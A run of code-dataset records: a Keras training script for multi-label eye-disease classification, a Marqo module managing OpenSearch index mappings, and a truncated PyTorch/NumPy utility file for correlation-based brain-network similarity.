labels.set_shape((8,))\n image = tf.io.decode_image(parsed['image_raw']) / 255\n image.set_shape(img_size + [3])\n return image, labels\n\nimage_feature_description = {\n 'image_raw': tf.io.FixedLenFeature([], tf.string),\n 'labels': tf.io.FixedLenFeature([], tf.string)\n}\ntrain_dataset = train_dataset.map(_parse_dataset, num_parallel_calls=AUTOTUNE).batch(32).prefetch(AUTOTUNE)\nval_dataset = val_dataset.map(_parse_dataset, num_parallel_calls=AUTOTUNE).batch(32).prefetch(AUTOTUNE)\ntest_dataset = test_dataset.map(_parse_dataset, num_parallel_calls=AUTOTUNE).batch(32).prefetch(AUTOTUNE)\n\n# Split a single TF Record into multiple files\ndef _parse_raw_dataset(example_proto, img_size=[360, 360]):\n parsed = tf.io.parse_single_example(example_proto, image_feature_description)\n labels = tf.io.parse_tensor(parsed['labels'], tf.int64)\n labels.set_shape((8,))\n image = parsed['image_raw']\n return image, labels\n\ndef shard_tfrecord(path, name, record):\n options = tf.io.TFRecordOptions(compression_type='GZIP')\n dset = tf.data.TFRecordDataset(record, compression_type='GZIP')\n dset = dset.map(_parse_raw_dataset).batch(1000)\n batch_id = 0\n for batch in dset:\n batch_ds = tf.data.Dataset.from_tensor_slices(batch)\n filename = f'{name}.{batch_id:03d}'\n record_path = os.path.join(path, filename)\n with tf.io.TFRecordWriter(record_path, options=options) as writer:\n for ex in batch_ds:\n tf_example = create_example(*ex)\n writer.write(tf_example.SerializeToString())\n batch_id += 1\n \ndef augment_image(image):\n image = tf.image.random_flip_left_right(image, seed=42)\n image = tf.image.random_flip_up_down(image, seed=42)\n image = tf.image.random_contrast(image, 0.8, 1.0, seed=42)\n image = tf.image.random_brightness(image, 0.1, seed=42)\n image = tf.minimum(image, 255)\n return image\n\ndef oversample_dataset(record, target):\n labels = []\n images = []\n \n augmented_images = []\n augmented_labels = []\n \n for batch in record:\n image = batch[0]\n label = batch[1]\n images.append(image)\n labels.append(label)\n \n images = tf.concat(images, 0)\n labels = tf.concat(labels, 0)\n \n for i in range(8):\n current = labels[:, i] == 1\n current_img = images[current]\n current_labels = labels[current]\n current_number = current_img.shape[0]\n \n # Number of images we need to create\n num_create = target - current_number\n \n if num_create < 0:\n augmented_images.extend(current_img)\n augmented_labels.extend(current_labels)\n continue\n \n ind = 0 \n for j in tqdm.trange(num_create):\n over_img = tf.io.decode_image(current_img[ind])\n over_lab = current_labels[ind]\n over_img = tf.io.encode_jpeg(augment_image(over_img))\n \n augmented_images.append(over_img)\n augmented_labels.append(over_lab)\n ind = min(ind, current_img.shape[0]-1)\n \n augmented_images.extend(current_img)\n augmented_labels.extend(current_labels)\n \n augmented_images = tf.stack(augmented_images)\n augmented_labels = tf.stack(augmented_labels)\n \n tf.random.set_seed(42)\n indices = tf.random.shuffle(tf.range(augmented_images.shape[0]), seed=42)\n augmented_images = tf.gather(augmented_images, indices)\n augmented_labels = tf.gather(augmented_labels, indices)\n \n return augmented_images, augmented_labels\n \ndef undersample(majority_images, majority_labels, target):\n tf.random.set_seed(42)\n indices = tf.random.shuffle(tf.range(majority_images.shape[0]), seed=42)[:target]\n under_sampled_img = tf.gather(majority_images, indices)\n under_sampled_labels = tf.gather(majority_labels, indices)\n return under_sampled_img, under_sampled_labels\n\n# Callbacks\nclass ExpoIncreaseLRCallback(keras.callbacks.Callback):\n \"\"\"\n Exponentially increases the learning rate by a constant factor. Meant to\n be run over a few hundred iterations in one epoch. Stores a history object\n of the loss and the learning rates. The optimal loss is usually about 10x\n lower than when the algorithm diverges (loss shoots up).\n \"\"\"\n def __init__(self, factor): \n super().__init__()\n self.loss = []\n self.lr = []\n self.factor = factor\n \n def on_batch_end(self, batch, logs=None):\n loss = logs['loss']\n prev_lr = K.get_value(self.model.optimizer.lr)\n self.lr.append(prev_lr)\n self.loss.append(loss)\n K.set_value(self.model.optimizer.lr, prev_lr * self.factor)\n\nclass OneCycleScheduler(keras.callbacks.Callback):\n \"\"\"\n Learning rate scheduler, implementing a cyclical learning rate (Smith, 2018).\n https://arxiv.org/abs/1803.09820 \n \"\"\"\n def __init__(self, epoch_size, batch_size, max_lr, max_momentum=0, min_momentum=0):\n super(OneCycleScheduler, self).__init__()\n self.max_lr = max_lr\n self.min_lr = max_lr / 10\n self.progress = 0\n self.iterations = epoch_size // batch_size\n self.max_momentum = max_momentum\n self.min_momentum = min_momentum\n \n def on_epoch_begin(self, epoch, logs=None):\n keras.backend.set_value(self.model.optimizer.lr, self.min_lr)\n keras.backend.set_value(self.model.optimizer.momentum, self.max_momentum)\n self.progress = 0\n \n def on_train_batch_begin(self, batch, logs=None):\n self.progress += 1\n \n # Finding rate of change to halfway through epoch\n half = self.iterations // 2 \n lr_roc = (self.max_lr - self.min_lr) / half\n \n # Increase if first half, else decrease\n if self.progress >= half:\n lr_roc *= -1\n lr = self.model.optimizer.lr\n cur_lr = lr + lr_roc\n keras.backend.set_value(self.model.optimizer.lr, cur_lr)\n \n # Finding rate of change for momentum\n momentum_roc = -((self.max_momentum - self.min_momentum) / half)\n \n # Decrease if first half, else decrease\n if self.progress >= half:\n momentum_roc *= -1\n momentum = self.model.optimizer.momentum\n cur_momentum = momentum + momentum_roc\n keras.backend.set_value(self.model.optimizer.momentum, cur_momentum)\n\ndef make_vgg_net():\n \"\"\"\n Implementation of the 2015 ILSVRC second place VGGNet-19 architecture.\n Note that the placement of the batch normalization layers in front of\n the activation was purposeful. There is some debate regarding whether\n or not the placement of BN before or after ReLU has any large effect\n on performance.\n\n From Simonyan et al., (2017) https://arxiv.org/pdf/1409.1556.pdf\n \"\"\"\n augmentation = keras.models.Sequential([\n keras.layers.experimental.preprocessing.RandomFlip('horizontal'),\n keras.layers.experimental.preprocessing.RandomFlip('vertical'),\n ])\n normalization = keras.layers.experimental.preprocessing.Normalization()\n for batch in train_dataset.take(3):\n img = batch[0]\n normalization.adapt(img)\n\n model = keras.models.Sequential([\n augmentation,\n normalization,\n keras.layers.Conv2D(64, 3, padding=\"same\", input_shape=[244, 244, 3]),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(64, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(2),\n keras.layers.Conv2D(128, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(128, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(pool_size=(2,2), strides=2),\n keras.layers.Conv2D(256, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(256, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(256, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(256, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(pool_size=(2,2), strides=2),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(pool_size=(2,2), strides=2),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(pool_size=(2,2), strides=2),\n keras.layers.Flatten(),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dropout(rate=0.5),\n keras.layers.Dense(4096, kernel_initializer='he_normal'),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dropout(rate=0.5),\n keras.layers.Dense(4096, kernel_initializer='he_normal'),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dropout(rate=0.5),\n keras.layers.Dense(1000, kernel_initializer='he_normal'),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(8, activation=\"sigmoid\")\n ])\n return model\n\ndef train_nadam_vgg_19():\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n model = make_vgg_net()\n model.compile(optimizer=keras.optimizers.Nadam(lr=3e-4),\n metrics=['binary_accuracy', 'AUC'], loss='binary_crossentropy')\n logdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_cb = keras.callbacks.TensorBoard(logdir)\n model_checkpoint_cb = keras.callbacks.ModelCheckpoint(\n '/content/drive/MyDrive/models/custom_vggnet19.h5',\n monitor='val_loss', save_best_only=True, save_freq='epoch')\n early_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\n csv_logger_cb =tf.keras.callbacks.CSVLogger(\n '/content/drive/MyDrive/learning_curves/custom_vggnet19.csv',\n separator=\",\", append=False)\n\n history = model.fit(\n train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[tensorboard_cb, model_checkpoint_cb,\n early_stopping_cb, csv_logger_cb])\n\n return model\n\n# Code for model predictions\ndef create_confusion_matrix(y_true, y_pred, names):\n confusion = multilabel_confusion_matrix(y_true, y_pred)\n fig, axes = plt.subplots(2, 4, figsize=(15, 8))\n fig.tight_layout()\n axes = axes.ravel()\n\n for ind, ax in enumerate(axes):\n confusion_display = ConfusionMatrixDisplay(confusion[ind], display_labels=[0, 1])\n confusion_display.plot(ax=ax, values_format='.5g')\n ax.set_title(names[ind])\n\ndef _to_labels(pos_probs, threshold):\n return (pos_probs >= threshold).astype('int')\n\ndef get_thresholds(model, dataset, samples=1):\n y_prob = np.stack([model.predict(dataset) for sample in range(samples)]).mean(axis=0)\n y_true = []\n for ind, batch in enumerate(dataset):\n y_true.append(batch[1])\n \n y_true = tf.concat(y_true, 0)\n thresholds = np.arange(0, 1, 0.001)\n class_thresholds = []\n\n for i in range(8):\n scores = [f1_score(y_true[:, i], _to_labels(y_prob[:, i], t)) for t in thresholds] \n ix = np.argmax(scores)\n class_thresholds.append(thresholds[ix])\n\n return class_thresholds\n\ndef get_predictions(model, class_thresholds, dataset, samples=1):\n y_prob = np.stack([model.predict(dataset) for sample in range(samples)]).mean(axis=0)\n y_true = []\n for ind, batch in enumerate(dataset):\n y_true.append(batch[1])\n \n y_true = tf.concat(y_true, 0)\n y_pred = []\n for ind, thresh in enumerate(class_thresholds):\n class_pred = np.where(y_prob[:, ind] > thresh, 1, 0)\n y_pred.append(tf.reshape(class_pred, (-1, 1)))\n y_pred = tf.concat(y_pred, 1)\n return y_true, y_pred\n\n\n\n\n# Custom VGGNet error analysis\nmodel = keras.models.load_model('/content/drive/MyDrive/models/custom_vggnet19.h5')\nthresholds = get_thresholds(model, val_dataset) \ny_true, y_pred = get_predictions(model, thresholds, test_dataset)\nprint(classification_report(y_true, y_pred))\nprint(roc_auc_score(y_true, y_pred))\ncreate_confusion_matrix(y_true, y_pred, dset.columns[2:])\n\n\n\n\n# VGGNet, same architecture, instead using SGD\nK.clear_session()\ntf.random.set_seed(42)\nrandom.seed(42)\n\n# Finding the optimial learning rate\nexpo_lr = ExpoIncreaseLRCallback(1.032)\nmodel = make_vgg_net()\nmodel.compile(optimizer=keras.optimizers.SGD(lr=0.0001), metrics=['binary_accuracy', 'AUC'], loss='binary_crossentropy')\nmodel.fit(train_dataset, epochs=1, callbacks=[expo_lr])\n\n\n\n\nplt.plot(expo_lr.lr, expo_lr.loss)\nplt.xscale('log')\n\n\n# 0.11 seems to be a good learning rate. We can use this as the maximum learning rate for our cyclical learning rate scheduler.\n\n\n\nmodel = make_vgg_net()\n\n# Callbacks\none_cycle_scheduler = OneCycleScheduler(11020, 32, 0.11)\nlogdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\ntensorboard_cb = keras.callbacks.TensorBoard(logdir)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint('/content/drive/MyDrive/models/SGD_vggnet19.h5', monitor='val_loss', save_best_only=True, save_freq='epoch')\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\ncsv_logger_cb =tf.keras.callbacks.CSVLogger('/content/drive/MyDrive/learning_curves/SGD_vggnet19.csv', separator=\",\", append=False)\n\noptimizer = keras.optimizers.SGD(lr=0.11)\nmodel.compile(optimizer=optimizer, metrics=['binary_accuracy', 'AUC'], loss='binary_crossentropy')\nhistory = model.fit(train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[one_cycle_scheduler, tensorboard_cb, model_checkpoint_cb, early_stopping_cb, csv_logger_cb])\n\n\n\n\nclass SEResidualUnit(keras.layers.Layer):\n \"\"\"\n The residual units with skip connections and SE-blocks. Based on\n Hu et al, (2017)\n\n https://arxiv.org/abs/1709.01507\n \"\"\"\n def __init__(self, filters, ratio=8, strides=1, activation='relu', **kwargs):\n super().__init__(**kwargs)\n self.activation = keras.activations.get(activation)\n self.filters = filters\n self.strides = strides\n\n # The main layers of the residual unit, two convolutional layers,\n # one with a stride of one and batch normalization layers\n self.main_layers = [\n keras.layers.Conv2D(filters, 3, strides=strides,\n padding='same', use_bias=False),\n keras.layers.BatchNormalization(),\n self.activation,\n keras.layers.Conv2D(filters, 3, strides=1,\n padding='same', use_bias=False),\n keras.layers.BatchNormalization(),\n ]\n\n # Defining the skip connection and the convolutional layer the inputs\n # have to pass through so as to ensure the shapes of added inputs are\n # the same as those going through the main layer\n self.skip_layers = []\n if strides > 1:\n self.skip_layers = [\n keras.layers.Conv2D(filters, 1, strides=strides,\n padding='same', use_bias=False),\n keras.layers.BatchNormalization()\n ]\n\n # SE Block\n self.ratio = ratio\n self.se_block = [\n keras.layers.GlobalAveragePooling2D(),\n keras.layers.Flatten(),\n keras.layers.Dense(filters//ratio, activation='relu', kernel_initializer='he_normal', use_bias=False),\n keras.layers.Dense(filters, activation='sigmoid', kernel_initializer='he_normal', use_bias=False),\n ]\n\n def call(self, inputs):\n \"\"\"\n Adding the inputs from the skip connection to the outputs and passing\n output of Residual Unit to SE block.\n \"\"\"\n # Residual unit\n Z = inputs\n for layer in self.main_layers:\n Z = layer(Z)\n\n # SE Block\n X = Z\n for layer in self.se_block:\n X = layer(X)\n Z = keras.layers.multiply([X, Z]) \n\n # Skip connection\n skip_Z = inputs\n for layer in self.skip_layers:\n skip_Z = layer(skip_Z)\n\n out = self.activation(Z + skip_Z)\n return out\n\n def get_config(self):\n activation = self.activation\n filters = self.filters\n strides = self.strides\n ratio = self.ratio\n base_config = super().get_config()\n return {**base_config, 'filters': filters, 'strides': strides,\n 'activation': keras.activations.serialize(activation), 'ratio': ratio}\n\n\ndef create_resnet():\n \"\"\"\n SE-ResNet-34 architecture\n\n \"\"\"\n augmentation = keras.models.Sequential([\n keras.layers.experimental.preprocessing.RandomFlip('horizontal'),\n keras.layers.experimental.preprocessing.RandomFlip('vertical'),\n ])\n model = keras.models.Sequential()\n model.add(augmentation)\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.Activation('relu'))\n model.add(keras.layers.Conv2D(64, 7, strides=2, input_shape=(244, 244, 3),\n padding='same', use_bias=False))\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.Activation('relu'))\n model.add(keras.layers.MaxPooling2D(2))\n prev_filters = 64\n for filters in [64] * 3 + [128] * 4 + [256] * 6 + [512] * 3:\n strides = 1 if prev_filters == filters else 2\n model.add(SEResidualUnit(filters, strides=strides, activation='relu'))\n model.add(keras.layers.GlobalAveragePooling2D())\n model.add(keras.layers.Flatten())\n model.add(keras.layers.Dense(1000, kernel_initializer='he_normal'))\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.Activation('relu'))\n model.add(keras.layers.Dense(8, activation='sigmoid'))\n return model\n\ndef find_sdg_se_resnet_lr():\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n one_cycle = OneCycleScheduler(11020, 32, 0.4)\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n expo_lr = ExpoIncreaseLRCallback(1.05)\n model = create_resnet()\n model.compile(optimizer=keras.optimizers.SGD(lr=0.4), loss='binary_crossentropy', metrics=['binary_accuracy', precision, recall, 'AUC'])\n history = model.fit(train_dataset, epochs=10, validation_data=val_dataset, callbacks=[one_cycle])\n return history\n\n\n\ndef train_sgd_se_resnet():\n # Training SE-Resnet-34 model\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n model = create_resnet()\n\n one_cycle = OneCycleScheduler(11020, 32, 0.4)\n logdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_cb = keras.callbacks.TensorBoard(logdir)\n model_checkpoint_cb = keras.callbacks.ModelCheckpoint(\n '/content/drive/MyDrive/models/SE_resnet34.h5', monitor='val_loss', save_best_only=True, save_freq='epoch')\n early_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\n csv_logger_cb = tf.keras.callbacks.CSVLogger('/content/drive/MyDrive/learning_curves/SE_resnet34_no_class_weights.csv', separator=\",\", append=False)\n\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n\n model.compile(optimizer=keras.optimizers.SGD(lr=0.4),\n loss='binary_crossentropy',\n metrics=['binary_accuracy', precision, recall, 'AUC'])\n\n history = model.fit(train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[one_cycle, model_checkpoint_cb, \n early_stopping_cb, csv_logger_cb, tensorboard_cb])\n return model\n\ndef train_nadam_se_resnet():\n # Training SE-Resnet-34 model with Nadam\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n model = create_resnet()\n\n # Callbacks\n logdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_cb = keras.callbacks.TensorBoard(logdir)\n model_checkpoint_cb = keras.callbacks.ModelCheckpoint(\n '/content/drive/MyDrive/models/Nadam_SE_resnet34.h5',\n monitor='val_loss', save_best_only=True, save_freq='epoch')\n early_stopping_cb = keras.callbacks.EarlyStopping(patience=30)\n csv_logger_cb = tf.keras.callbacks.CSVLogger(\n '/content/drive/MyDrive/learning_curves/SE_resnet34_Nadam.csv',\n separator=\",\", append=True)\n\n # Metrics\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n\n # Compile model\n model.compile(optimizer=keras.optimizers.Nadam(lr=3e-4),\n loss='binary_crossentropy',\n metrics=['binary_accuracy', precision, recall, 'AUC'])\n\n # Model training\n history = model.fit(train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[model_checkpoint_cb, early_stopping_cb, \n csv_logger_cb, tensorboard_cb])\n return model\n\n\ndef train_class_weights_se_resnet():\n # Computing class weights\n totals = tf.reduce_sum(y_train, axis=0).numpy()\n labels = []\n for ind, val in enumerate(totals):\n labels.extend([ind] * val)\n class_weights = compute_class_weight('balanced', np.arange(8), labels)\n class_weights = dict(enumerate(class_weights))\n\n # Training a class weighted SE_Resnet\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n\n logdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_cb = keras.callbacks.TensorBoard(logdir)\n model_checkpoint_cb = keras.callbacks.ModelCheckpoint(\n '/content/drive/MyDrive/models/SE_resnet34_class_weights.h5',\n monitor='val_loss', save_best_only=True, save_freq='epoch')\n early_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\n csv_logger_cb = tf.keras.callbacks.CSVLogger(\n '/content/drive/MyDrive/learning_curves/SE_resnet34_class_weights.csv',\n separator=\",\", append=False)\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n model.compile(optimizer=keras.optimizers.Nadam(lr=3e-4), \n metrics=['binary_accuracy', precision, recall, 'AUC'],\n loss='binary_crossentropy')\n history = model.fit(train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[tensorboard_cb, model_checkpoint_cb, \n early_stopping_cb, csv_logger_cb], \n class_weight=class_weights)\n return model\n\ndef train_oversampled_se_resnet_34():\n # Testing oversampling, creating balanced classes with copies of minority\n # classes with data augmentation\n dset_train_oversample = os.path.join(os.curdir, './records_over1000/dset_train.tfrecord')\n train_dataset_oversample = tf.data.TFRecordDataset(dset_train_oversample, compression_type='GZIP').shuffle(2048)\n train_dataset_oversample = train_dataset_oversample.map(_parse_dataset, num_parallel_calls=AUTOTUNE).batch(32).prefetch(AUTOTUNE)\n\n # Training an SE-Resnet-34 on the oversampled dataset\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n one_cycle = OneCycleScheduler(11020, 32, 0.4)\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n expo_lr = ExpoIncreaseLRCallback(1.035)\n model = create_resnet()\n model.compile(optimizer=keras.optimizers.Nadam(lr=3e-4), loss='binary_crossentropy', metrics=['binary_accuracy', precision, recall, 'AUC'])\n history = model.fit(train_dataset_oversample, epochs=10, validation_data=val_dataset)\n return model\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"derekdhuynh/multiple-ocular-disease-detection","sub_path":"ocularnn/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":30519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71857639549","text":"\"\"\"Communication with Marqo's persistence and search layer (OpenSearch)\"\"\"\nimport json\nfrom marqo.tensor_search.models.index_info import IndexInfo\n# client-specific modules - we may want to replace these:\nfrom marqo._httprequests import HttpRequests\nfrom marqo.config import Config\nfrom marqo.errors import MarqoError\nfrom marqo.tensor_search import validation, constants, enums\nfrom marqo.tensor_search import utils\nfrom marqo import errors\n#\nfrom typing import Iterable, List, Union, Optional, Tuple\nfrom marqo.tensor_search.index_meta_cache import get_cache\n\n\ndef get_index_info(config: Config, index_name: str) -> IndexInfo:\n \"\"\"Gets useful information about the index. Also updates the IndexInfo cache\n\n Args:\n config:\n index_name:\n\n Returns:\n IndexInfo of the index\n\n Raises:\n NonTensorIndexError, if the index's mapping doesn't conform to a Tensor Search index\n\n \"\"\"\n res = HttpRequests(config).get(path=F\"{index_name}/_mapping\")\n\n if not (index_name in res and \"mappings\" in res[index_name]\n and \"_meta\" in res[index_name][\"mappings\"]):\n raise errors.NonTensorIndexError(\n f\"Error retrieving index info for index {index_name}\")\n\n if \"model\" in res[index_name][\"mappings\"][\"_meta\"]:\n model_name = res[index_name][\"mappings\"][\"_meta\"][\"model\"]\n else:\n raise errors.NonTensorIndexError(\n \"get_index_info: couldn't identify embedding model name \"\n F\"in index mappings! Mapping: {res}\")\n\n if \"index_settings\" in res[index_name][\"mappings\"][\"_meta\"]:\n index_settings = res[index_name][\"mappings\"][\"_meta\"][\"index_settings\"]\n else:\n raise errors.NonTensorIndexError(\n \"get_index_info: couldn't identify index_settings \"\n F\"in index mappings! Mapping: {res}\")\n\n index_properties = res[index_name][\"mappings\"][\"properties\"]\n\n index_info = IndexInfo(model_name=model_name, properties=index_properties,\n index_settings=index_settings)\n get_cache()[index_name] = index_info\n return index_info\n\n\ndef add_customer_field_properties(config: Config, index_name: str,\n customer_field_names: Iterable[Tuple[str, enums.OpenSearchDataType]],\n model_properties: dict):\n \"\"\"Adds new customer fields to index mapping.\n\n Pushes the updated mapping to OpenSearch, and updates the local cache.\n\n Args:\n config:\n index_name:\n customer_field_names: list of 2-tuples. The first elem in the tuple is\n the new fieldnames the customers have made. The second elem is the\n inferred OpenSearch data type.\n model_properties: properties of the machine learning model\n\n Returns:\n HTTP Response\n \"\"\"\n if config.cluster_is_s2search:\n engine = \"nmslib\"\n else:\n engine = \"lucene\"\n\n body = {\n \"properties\": {\n enums.TensorField.chunks: {\n \"type\": \"nested\",\n \"properties\": {\n validation.validate_vector_name(\n utils.generate_vector_name(field_name[0])): {\n \"type\": \"knn_vector\",\n \"dimension\": model_properties[\"dimensions\"],\n \"method\": {\n \"name\": \"hnsw\",\n \"space_type\": \"cosinesimil\",\n \"engine\": engine,\n \"parameters\": {\n \"ef_construction\": 128,\n \"m\": 24\n }\n }\n } for field_name in customer_field_names\n }\n }\n }\n }\n\n existing_info = get_cache()[index_name]\n new_index_properties = existing_info.properties.copy()\n\n # copy fields to the chunk for prefiltering. If it is text, convert it to a keyword type to save space\n # if it's not text, ignore it, and leave it up to OpenSearch (e.g: if it's a number)\n for field_name in customer_field_names:\n if field_name[1] == enums.OpenSearchDataType.text \\\n or field_name[1] == enums.OpenSearchDataType.keyword:\n body[\"properties\"][enums.TensorField.chunks][\"properties\"][validation.validate_field_name(field_name[0])] = {\n \"type\": enums.OpenSearchDataType.keyword,\n \"ignore_above\": 32766 # this is the Marqo-OS bytes limit\n }\n\n mapping_res = HttpRequests(config).put(path=F\"{index_name}/_mapping\", body=json.dumps(body))\n\n merged_chunk_properties = {\n **existing_info.properties[enums.TensorField.chunks][\"properties\"],\n **body[\"properties\"][enums.TensorField.chunks][\"properties\"]\n }\n new_index_properties[enums.TensorField.chunks][\"properties\"] = merged_chunk_properties\n\n # Save newly created fields to document-level so that it is searchable by lexical search\n # These will be undefined, and we let OpenSearch define them, the next\n # time they're retrieved from the cache\n existing_properties = set(existing_info.get_text_properties())\n applying_properties = {field[0] for field in customer_field_names}\n app_type_mapping = {field: field_type for field, field_type in customer_field_names}\n new_properties = applying_properties - existing_properties\n for new_prop in new_properties:\n type_to_set = app_type_mapping[new_prop] if app_type_mapping[new_prop] == enums.OpenSearchDataType.text \\\n else enums.OpenSearchDataType.to_be_defined\n new_index_properties[validation.validate_field_name(new_prop)] = {\n \"type\": type_to_set\n }\n get_cache()[index_name] = IndexInfo(\n model_name=existing_info.model_name,\n properties=new_index_properties,\n index_settings=existing_info.index_settings.copy()\n )\n return mapping_res\n\n\ndef get_cluster_indices(config: Config):\n \"\"\"Gets the name of all indices\"\"\"\n res = HttpRequests(config).get(path=\"_aliases\")\n indices = set(res.keys())\n relevant_indices = indices - constants.INDEX_NAMES_TO_IGNORE\n return relevant_indices\n","repo_name":"devwork622/marqo","sub_path":"src/marqo/tensor_search/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21468065731","text":"import numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport scipy.sparse as sp\r\nimport scipy.stats as stats\r\n\r\n\r\ndef onehot_encode(labes):\r\n classes = set(labes)\r\n classes_dict = {c: np.identity(len(classes))[i, :] for i, c in enumerate(classes)}\r\n labes_onehot = np.array(list(map(classes_dict.get, labes)), dtype=np.int32)\r\n #print(labes_onehot.shape)\r\n return labes_onehot\r\n\r\n\r\ndef accuracy(output, labels):\r\n preds = output.max(1)[1].type_as(labels)\r\n correct = preds.eq(labels).double()\r\n correct = correct.sum()\r\n return correct / len(labels)\r\n\r\n\r\n# 权重矩阵(皮尔逊相关系数)\r\ndef set_weight(X):\r\n X = X.detach().numpy()\r\n # 节点个数\r\n row = X.shape[0]\r\n # 特征个数\r\n col = X.shape[1]\r\n # 初始化权重矩阵\r\n W = np.zeros((row, col, col))\r\n for k in range(row):\r\n for i in range(col):\r\n for j in range(col):\r\n # 主对角线元素为0\r\n if j != i:\r\n # Pearson\r\n W[k][i][j] = np.min(np.corrcoef(X[k][i], X[k][j]))\r\n # Spearman\r\n # W[k][i][j] = stats.spearmanr(X[k][i], X[k][j])[0] # 返回两个值:correlation,pvalue。\r\n # Kendall\r\n # W[k][i][j] = stats.kendalltau(X[k][i], X[k][j])[0] # 返回两个值:correlation,pvalue。\r\n W = weight_threshold(W)\r\n W = torch.FloatTensor(W)\r\n return W\r\n\r\n\r\n# 权重矩阵阈值化(关联系数最小的20%元素置0)\r\ndef weight_threshold(W):\r\n row = W.shape[0]\r\n col = W.shape[1]\r\n result = np.zeros((row, col, col))\r\n for i in range(row):\r\n threshold = np.sort(np.abs(W[i].flatten()))[int(col * col * 0.2)] # 阈值\r\n result[i] = W[i] * (np.abs(W[i]) >= threshold)\r\n return result\r\n\r\n# 相似性计算(生成脑网络gen与标准脑网络std)\r\ndef similar(gen, std):\r\n gen = gen.detach().numpy()\r\n std = std.detach().numpy()\r\n row = gen.shape[0]\r\n col = gen.shape[1]\r\n C = np.zeros((row, 1))\r\n for i in range(row):\r\n G = gen[i].reshape(col, col)\r\n tmp = np.abs(G - std)\r\n temp = tmp ** 2\r\n C[i] = 1 / np.sum(temp)\r\n C = torch.FloatTensor(C)\r\n return C\r\n\r\n# 风险预测P\r\ndef predict(gen, std):\r\n gen = gen.detach().numpy()\r\n std = std.detach().numpy()\r\n row = gen.shape[0]\r\n col = gen.shape[1]\r\n S = np.zeros((row, col, col))\r\n P = np.zeros(row)\r\n for k in range(row):\r\n temp = gen[k].reshape(col, col)\r\n for i in range(col):\r\n for j in range(col):\r\n if np.abs(temp[i, j] - std[i, j]) <= 0.1:\r\n S[k, i, j] = 1\r\n for m in range(row):\r\n P[m] = np.sum(S[m]) / (col * (col - 1))\r\n P = torch.FloatTensor(P)\r\n return 